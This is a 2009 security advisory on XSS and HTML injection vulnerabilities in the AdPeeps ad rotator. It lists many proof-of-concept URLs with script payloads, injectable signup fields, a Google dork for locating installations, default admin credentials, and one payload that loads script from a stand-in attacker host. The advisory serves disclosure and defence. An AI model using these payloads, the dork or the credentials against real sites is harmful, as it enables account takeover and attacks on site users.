Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21901
HistoryMay 29, 2009 - 12:00 a.m.

[InterN0T] AdPeeps 8.5d1 - XSS and HTML Injection Vulnerabilities

2009-05-2900:00:00
vulners.com
62

AdPeeps Ad Rotator - XSS and HTML Injection Vulnerabilities

Version Affected: 8.5d1 (3-18-09) (newest)

Info: Ad Peeps is a banner rotator and text ad rotator - all in one that allows you to track,
sell and manage banner ads, rich-media/flash ads and text ads on your website. Built using
PHP/MYSQL, Ad Peeps provides you and your advertisers with highly detailed real-time statistics
and is capable of delivering millions of impressions per day on a typical shared web server. -
Plus, you can try it right now on your website with our 7 day trial.

Ad Peeps is so versatile that it can even show your text ads Yahoo! Style or Google AdWords
Style. Unlike many other banner ad rotator programs, Ad Peeps was skillfully designed to use
minimal server resources while maintaining speed and unparalleled performance. Built on a highly
scalable and versatile database architecture, Ad Peeps works without fuss even on high traffic
web sites and won't crash your high powered website…

Opinion: AdPeeps, along with many others should really hire people to audit their code.

Credits: Matt and all of InterN0T :-)

Googled0rk: (there might be more accurate d0rks)
intitle:"Advertisement Management Control Panel"

External Links:
http://www.adpeeps.com/
http://www.adpeeps.com/signup.html
http://demo.adpeeps.com/index.php?loc=adminlogin&uid=100000

Default Login:
admin / admin

-:: The Advisory ::-

Version Information:
http://www.website.tld/adpeeps/index.php?loc=adminlogin&uid=100000

Information Disclosure: (discloses the full path to the file)
http://www.website.tld/adpeeps/index.php?loc=view_adrates&uid=SomeRandomString

Vulnerable Function / ID Calls: (XSS)
uid, campainid, type, period, loginpass, accname, e9, from, subject & idno

Possible Filtered / Bad Chars: ' (quotes are semi-filtered too with a \ prepended, however this
does not prevent XSS from being executed)

Cross Site Scripting: ( "><script>alert(0)</script> )
http://www.website.tld/adpeeps/index.php?uid=&quot;&gt;&lt;script&gt;alert&#40;0&#41;&lt;/script&gt;
http://www.website.tld/adpeeps/index.php?loc=login_lookup&amp;uid=&quot;&gt;&lt;script&gt;alert&#40;0&#41;&lt;/script&gt;
http://www.website.tld/adpeeps/index.php?loc=adminlogin&amp;uid=&quot;&gt;&lt;script&gt;alert&#40;0&#41;&lt;/script&gt;
http://www.website.tld/adpeeps/index.php?loc=createcampaign&amp;mode=new&amp;uid=100000&amp;campaignid=&quot;&gt;&lt;script&gt;alert&#40;0&#41;&lt;/script&gt;
http://www.website.tld/adpeeps/index.php?loc=view_account_stats&amp;uid=100000&amp;type=&quot;&gt;&lt;script&gt;alert&#40;2&#41;&lt;/script&gt;&amp;period=&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;/script&gt;
http://www.website.tld/adpeeps/index.php?loc=view_adrates&amp;uid=&quot;&gt;&lt;script&gt;alert&#40;0&#41;&lt;/script&gt;
http://www.website.tld/adpeeps/index.php?loc=account_confirmation&amp;accname=&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;/script&gt;&amp;loginpass=&quot;&gt;&lt;script&gt;alert&#40;2&#41;&lt;/script&gt;&amp;uid=100000
http://www.website.tld/adpeeps/index.php?loc=setup_account&amp;e6=new&amp;e12=bypass&amp;e9=&quot;&gt;&lt;script&gt;alert&#40;0&#41;&lt;/script&gt;
http://www.website.tld/adpeeps/index.php?loc=email_advertisers&amp;uid=100000&amp;mode=1&amp;errors=&amp;from=&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;/script&gt;&amp;message=&amp;subject=&quot;&gt;&lt;script&gt;alert&#40;2&#41;&lt;/script&gt;
http://www.website.tld/adpeeps/index.php?loc=edit_ad_package&amp;uid=100000&amp;idno=&quot;&gt;&lt;script&gt;alert&#40;0&#41;&lt;/script&gt;
– The Cross Site Scripting will most likely not survive any logins from what our research
results showed.

Affected Fields in the Signup Formular by HTML Injection:

  • Advertiser Name
  • First Name
  • Last Name
  • *Advertiser E-Mail
  • Address
  • Phone Number
  • Password Hint
  • URL to goto on click
    *Was not tested but might be vulnerable.

Avoid HTML Injection In: (these fields gets sent to the administrator by e-mail)
Advertiser Name
First & Last Name
Advertiser E-mail

HTML Injection: : (insert: "><script>alert(0)</script> into the mentioned forms)
http://www.website.tld/adpeeps/index.php?loc=view_adrates&amp;uid=100000

  • One will have to buy a user / ad-spot in order to exploit this issue.

Affected Sites by HTML Injection: (where Advertiser Name, First- and Last-name isn't used)
http://www.website.tld/adpeeps/index.php?loc=createcampaign&amp;mode=edit&amp;uid=100000&amp;campaignid=VALIDID
(phone and passhint)
http://www.website.tld/adpeeps/index.php?loc=view_campaign_stats&amp;uid=100000&amp;campaignid=VALIDID
(address and phone)
http://www.website.tld/adpeeps/index.php?loc=view_ad_stats&amp;uid=100000&amp;campaignid=VALIDID&amp;adno=VALIDID
(ad url)
http://www.website.tld/adpeeps/index.php?loc=createadvertad&amp;campaignid=VALIDID&amp;uid=100000&amp;adno=VALIDID&amp;adtype=banner
(ad url)

Affected Sites by HTML Injection: (where advertiser name is used)
http://www.website.tld/adpeeps/index.php?loc=view_account_stats&amp;uid=100000&amp;type=overall&amp;period=all
http://www.website.tld/adpeeps/index.php?loc=mass_update_target_weight&amp;uid=100000
http://www.website.tld/adpeeps/index.php?loc=orderhistory&amp;uid=100000
http://www.website.tld/adpeeps/index.php?loc=email_advertisers&amp;uid=100000&amp;mode=1&amp;errors=&amp;from=&amp;message=&amp;subject=
http://www.website.tld/adpeeps/index.php?loc=campaignview&amp;uid=100000&amp;messagecode=void
http://www.website.tld/adpeeps/index.php?loc=previouslydeleted&amp;uid=100000 << Only when the Admin
has deleted the user and looks at this page!
http://www.website.tld/adpeeps/index.php?loc=createcampaign&amp;mode=edit&amp;uid=100000&amp;campaignid=VALIDID
http://www.website.tld/adpeeps/index.php?loc=view_campaign_stats&amp;uid=100000&amp;campaignid=VALIDID

Affected Sites by HTML Injection: (which requires abnormal injection. (the common alert(0) did
not work))
http://www.website.tld/adpeeps/index.php?loc=createcampaign&amp;mode=edit&amp;uid=100000&amp;campaignid=VALIDID
(first- and/or last-name)
http://www.website.tld/adpeeps/index.php?loc=email_advertisers&amp;uid=100000&amp;mode=1&amp;errors=&amp;from=&amp;message=&amp;subject=
(first- and/or last-name)
http://www.website.tld/adpeeps/index.php?loc=createcampaign&amp;mode=edit&amp;uid=100000&amp;campaignid=VALIDID
(first- and/or last-name)
http://www.website.tld/adpeeps/index.php?loc=view_campaign_stats&amp;uid=100000&amp;campaignid=VALIDID
(first- and/or last-name)
The above "abnormal" injection we tested with was: "></td></tr></table><SCRIPT
SRC=http://evilsite.tld/xss.js&gt;&lt;/SCRIPT&gt;&lt;!--

-:: Solution ::-
The most easy solution is to validate user input and strip or convert bad / html characters.

Conclusion:
Even if One decides to (ab)use the Advertiser Name, First- and Last-name's as injection points
and the administrator sees this (in an e-mail), then he will still be affected by the injection
and possibly have a hard time deleting those malicious users safely except if he might have
NoScript turned on for his own website. (the injection points might render the desired pages
useless)

Reference:
http://forum.intern0t.net/exploits-vulnerabilities-pocs/1049-intern0t-adpeeps-8-5d1-cross-site-scripting-html-injection-vulnerabilities.html

Disclosure Information:

  • Vulnerabilities found 26th May 2009.
  • Advisory finished and published on InterN0T th 27th May.
  • Bugtraq (SecurityFocus) and Milw0rm contacted the 27th May.
    *AdPeeps will be contacted soon. (full disclosure rocks!)

All of the best,
MaXe